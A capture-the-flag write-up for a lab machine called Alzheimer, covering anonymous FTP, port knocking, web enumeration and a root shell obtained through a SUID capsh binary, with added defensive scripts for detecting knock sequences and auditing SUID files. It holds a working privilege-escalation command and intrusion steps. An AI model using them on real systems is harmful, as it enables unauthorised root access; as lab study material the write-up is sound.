This is a Linux machine with only the FTP service exposed at first. SSH and the web service open after I knock the ports listed in a secret file leaked via FTP. After that I obtain the username from a secret on the web service and the password for that user from the hidden FTP file; with this credential I gain an initial foothold on the system.

Then I find a special executable (capsh) with the SUID bit set, which can be exploited to get a root shell.

Summary

Scope

  • Name: Alzheimer
  • Difficulty: Easy
  • OS: Linux
  • IP: Local VM

Learned

Port knocking is interesting for controlling the behavior of services.

Enumeration

Nmap

Overall

# Nmap 7.98 scan initiated Sat Mar  7 16:42:13 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.147
Nmap scan report for alzheimer (192.168.1.147)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp open     ftp
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:73:6C:BF (Oracle VirtualBox virtual NIC)

# Nmap done at Sat Mar  7 16:42:14 2026 -- 1 IP address (1 host up) scanned in 0.74 seconds

Detail

# Nmap 7.98 scan initiated Sat Mar  7 16:41:18 2026 as: nmap -sC -sV -O -vv -p21,22,80 -oN detail 192.168.1.147
Nmap scan report for alzheimer (192.168.1.147)
Host is up, received arp-response (0.00047s latency).
Scanned at 2026-03-07 16:41:18 CST for 4s

PORT   STATE    SERVICE REASON         VERSION
21/tcp open     ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp filtered ssh     no-response
80/tcp filtered http    no-response
MAC Address: 08:00:27:73:6C:BF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/7%OT=21%CT=%CU=42127%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69ABE4B2%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=106%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 1.070 days (since Fri Mar  6 15:00:07 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  7 16:41:22 2026 -- 1 IP address (1 host up) scanned in 3.64 seconds

FTP

FTP is the only service I can access currently, and it allows anonymous login.

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ ftp [email protected]
Connected to 192.168.1.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        113          4096 Oct 03  2020 .
drwxr-xr-x    2 0        113          4096 Oct 03  2020 ..
-rw-r--r--    1 0        0              70 Oct 03  2020 .secretnote.txt
226 Directory send OK.
ftp> binary
200 Switching to Binary mode.
ftp> get .secretnote.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .secretnote.txt (70 bytes).
226 Transfer complete.
70 bytes received in 0.0009 seconds (73.3553 kbytes/s)

The secret hints that we should knock these three ports one by one.

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat secretnote.txt
I need to knock this ports and
one door will be open!
1000
2000
3000

I was not familiar with port knocking before; after some searching on Google I found this useful page on the ArchWiki.

#!/bin/bash
# Knock client from the ArchWiki page: one TCP probe per port, in the order given.
# Usage: ./knock.sh <host> <port> [<port> ...]
HOST=$1
shift
for ARG in "$@"
do
        # -Pn skips host discovery; a single, unretried probe per port is all a knock needs
        nmap -Pn --host-timeout 100 --max-retries 0 -p "$ARG" "$HOST"
done

The SSH and Web services will open after knocking.

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-07 16:49 +0800
Nmap scan report for alzheimer (192.168.1.147)
Host is up (0.0013s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT   STATE    SERVICE
21/tcp open     ftp
22/tcp open ssh
80/tcp open http
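
From the defender's side, a knock sequence is easy to spot in firewall logs if the knock ports are logged. The following is an added example, not code from the writeup or from the ArchWiki page: it assumes an iptables LOG rule with --log-prefix "KNOCK:" on the three ports, parses constructed log lines, and reports every source that sent 1000, 2000, 3000 in order within a time window, resetting on a wrong or late knock the way a knockd-style daemon does.

```python
import re
from datetime import datetime

# Constructed iptables LOG lines (assumed "KNOCK:" prefix; not taken from the writeup).
# 192.168.1.33 sends the sequence correctly, .50 sends it out of order, and .60 sends it
# in order but too slowly for a 10-second window.
SAMPLE_LOG = """\
Mar  7 16:49:01 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.33 DST=192.168.1.147 PROTO=TCP SPT=40001 DPT=1000 SYN
Mar  7 16:49:02 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.33 DST=192.168.1.147 PROTO=TCP SPT=40002 DPT=2000 SYN
Mar  7 16:49:03 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.33 DST=192.168.1.147 PROTO=TCP SPT=40003 DPT=3000 SYN
Mar  7 16:49:05 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.50 DST=192.168.1.147 PROTO=TCP SPT=40004 DPT=1000 SYN
Mar  7 16:49:06 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.50 DST=192.168.1.147 PROTO=TCP SPT=40005 DPT=3000 SYN
Mar  7 16:49:07 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.50 DST=192.168.1.147 PROTO=TCP SPT=40006 DPT=2000 SYN
Mar  7 16:50:30 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.60 DST=192.168.1.147 PROTO=TCP SPT=40007 DPT=1000 SYN
Mar  7 16:51:00 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.60 DST=192.168.1.147 PROTO=TCP SPT=40008 DPT=2000 SYN
Mar  7 16:51:10 alzheimer kernel: KNOCK: IN=enp0s3 OUT= SRC=192.168.1.60 DST=192.168.1.147 PROTO=TCP SPT=40009 DPT=3000 SYN
"""

# The sequence from .secretnote.txt on this box.
KNOCK_SEQUENCE = (1000, 2000, 3000)

# syslog timestamp, then the SRC= and DPT= fields of the LOG line.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, source_ip, destination_port) or None for lines that do not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less, fine for deltas
    return ts, m.group("src"), int(m.group("dpt"))


def find_knock_sequences(lines, sequence=KNOCK_SEQUENCE, window_seconds=10):
    """Return [(source_ip, completion_time)] for each source that sends the full sequence
    in order, each knock within window_seconds of the previous one."""
    state = {}  # source_ip -> (index of the next expected port, timestamp of last knock)
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        idx, last = state.get(src, (0, None))
        if last is not None and (ts - last).total_seconds() > window_seconds:
            idx = 0  # too slow: start over, like a knockd seq_timeout
        if dpt == sequence[idx]:
            idx += 1
        else:
            idx = 1 if dpt == sequence[0] else 0  # wrong port resets the sequence
        if idx == len(sequence):
            hits.append((src, ts.strftime("%H:%M:%S")))
            idx = 0
        state[src] = (idx, ts)
    return hits


if __name__ == "__main__":
    for src, when in find_knock_sequences(SAMPLE_LOG.splitlines()):
        print(f"knock sequence completed by {src} at {when}")
```

A full port scan that happens to hit the three ports in order inside the window produces the same hit, so treat a match as a lead to correlate with the SSH or HTTP connections that follow it rather than as proof on its own.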

Web

Then I obtain the user medusa from the homepage of the web service; his password is stored in a .txt file.

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat index.html
I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa

<!---. --- - .... .. -. --. -->

The comment seems to include Morse code. I decode it with a tool I wrote and get 'NOTHING'.

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ echo '-. --- - .... .. -. --.' | morsecode -d
NOTHING
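
The decoder below is an added example, not the author's morsecode tool: it pulls every HTML comment out of the page, keeps the ones made only of dots, dashes and separators, and decodes them with the standard International Morse table (the sample HTML is a constructed copy of the index.html shown above).

```python
import re

# International Morse code for letters and digits (standard table, not page-specific).
MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def decode_morse(text):
    """Decode Morse where letters are separated by one space and words by ' / ' or
    three or more spaces. Unknown tokens become '?' so a damaged comment still decodes."""
    words = re.split(r"\s*/\s*|\s{3,}", text.strip())
    return " ".join(
        "".join(MORSE_TABLE.get(token, "?") for token in word.split()) for word in words
    )


COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def morse_from_html_comments(html):
    """Return the decoded text of every HTML comment that consists only of Morse symbols."""
    results = []
    for body in COMMENT_RE.findall(html):
        body = body.strip()
        if body and re.fullmatch(r"[.\-/\s]+", body):
            results.append(decode_morse(body))
    return results


# Constructed copy of the page's index.html as served by the web service.
SAMPLE_HTML = """I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa

<!---. --- - .... .. -. --. -->
"""

if __name__ == "__main__":
    print(morse_from_html_comments(SAMPLE_HTML))  # ['NOTHING']
```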

Then I enumerate this service with feroxbuster and get some interesting clues.

404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       27w      132c http://192.168.1.147/
301      GET        7l       12w      185c http://192.168.1.147/admin => http://192.168.1.147/admin/
301      GET        7l       12w      185c http://192.168.1.147/home => http://192.168.1.147/home/
301      GET        7l       12w      185c http://192.168.1.147/secret => http://192.168.1.147/secret/
200      GET        2l        7w       34c http://192.168.1.147/home/index.html
301      GET        7l       12w      185c http://192.168.1.147/secret/home => http://192.168.1.147/secret/home/
200      GET        1l        8w       44c http://192.168.1.147/secret/index.html
200      GET        2l       13w       62c http://192.168.1.147/secret/home/index.html

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/home
Maybe my pass is at home!
-medusa

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/secret
Maybe my password is in this secret folder?

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/secret/home
Im trying a lot. Im sure that i will recover my pass!
-medusa

It seems no password is leaked by the web service. Then I go back to the FTP service, since it may have changed after port knocking. Fortunately, I am right: the hidden file it leaks now includes the password of user medusa.

❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat .secretnote.txt
I need to knock this ports and
one door will be open!
1000
2000
3000
Iha*******************

Privilege Escalation

The special binaries capsh and id stand out after I enumerate the sudo rules and SUID programs on the system.

medusa@alzheimer:~$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
medusa:x:1000:1000:medusa,,,:/home/medusa:/bin/bash
medusa@alzheimer:~$ id
uid=1000(medusa) gid=1000(medusa) groups=1000(medusa),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
medusa@alzheimer:~$ sudo -l
Matching Defaults entries for medusa on alzheimer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User medusa may run the following commands on alzheimer:
    (ALL) NOPASSWD: /bin/id
medusa@alzheimer:~$ crontab -l
no crontab for medusa
medusa@alzheimer:~$ uname -a
Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
medusa@alzheimer:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l
medusa@alzheimer:~$ find / -mount -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh

We can run /bin/id as root; unfortunately, id cannot be exploited, but capsh can: https://gtfobins.org/gtfobins/capsh/

I get a root shell with it.
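
The fix for this box is simply to clear the SUID bit on capsh, but the useful habit is to audit SUID binaries against a baseline so an odd one stands out. The script below is an added example, not part of the writeup: the EXPECTED_SUID baseline is taken from the find output above with capsh removed (an assumption about what a stock Debian 10 install ships), NEVER_SUID is my own short list of binaries that should never be SUID root because they hand out shells or uid changes by design, and scan_suid reproduces the find -perm -u=s walk in Python.

```python
import os
import stat

# SUID binaries that were in the find output above and are normal for Debian 10
# (assumed baseline; adjust it to your own golden image).
EXPECTED_SUID = frozenset({
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/newgrp",
    "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/umount",
    "/usr/bin/gpasswd",
})

# Basenames that must never carry SUID root: each can change uid/gid or run a
# command of the caller's choosing (my own list; capsh is the one on this box).
NEVER_SUID = frozenset({"capsh", "bash", "sh", "dash", "python3", "perl", "env", "find", "vim"})

# The full listing from the writeup, used as sample input.
PAGE_SUID_LISTING = [
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/bin/chsh", "/usr/bin/sudo",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/umount", "/usr/bin/gpasswd", "/usr/sbin/capsh",
]


def scan_suid(root="/"):
    """Walk one filesystem and return the sorted paths of regular files with the SUID
    bit set, equivalent to `find / -mount -perm -u=s`. Unreadable entries are skipped."""
    root_dev = os.lstat(root).st_dev
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        kept = []
        for d in dirnames:  # stay on the starting device, like find -mount
            try:
                if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev:
                    kept.append(d)
            except OSError:
                pass
        dirnames[:] = kept
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid(paths, expected=EXPECTED_SUID, never=NEVER_SUID):
    """Sort SUID paths into 'expected' (in the baseline), 'dangerous' (basename in the
    never-SUID list) and 'unknown' (not in the baseline; needs a human look)."""
    report = {"expected": [], "dangerous": [], "unknown": []}
    for path in sorted(paths):
        if path in expected:
            report["expected"].append(path)
        elif os.path.basename(path) in never:
            report["dangerous"].append(path)
        else:
            report["unknown"].append(path)
    return report


if __name__ == "__main__":
    report = audit_suid(scan_suid("/"))
    for category in ("dangerous", "unknown"):
        for path in report[category]:
            print(f"{category}: {path}")
```

Run against the listing from the box, the report puts only /usr/sbin/capsh under "dangerous"; on a real host the "unknown" bucket is where vendor tools and leftovers land, and each entry there either joins the baseline or loses its SUID bit with chmod u-s.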

medusa@alzheimer:~$ /usr/sbin/capsh --uid=0 --gid=0 --
root@alzheimer:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(medusa)